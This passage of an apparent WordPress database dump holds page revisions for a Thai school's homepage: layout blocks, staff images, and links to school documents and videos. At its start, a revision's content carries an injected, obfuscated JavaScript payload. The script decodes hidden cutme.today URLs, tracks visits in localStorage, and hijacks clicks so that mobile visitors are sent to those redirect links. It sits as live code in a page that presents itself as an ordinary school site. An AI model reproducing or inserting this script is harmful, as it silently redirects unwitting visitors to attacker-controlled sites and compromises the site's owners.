8\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 08:52:50','2024-08-30 01:52:50','',19,'http://watprato.ssk.in.th/?p=277',0,'revision','',0),
(278,2,'2024-08-30 08:54:14','2024-08-30 01:54:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 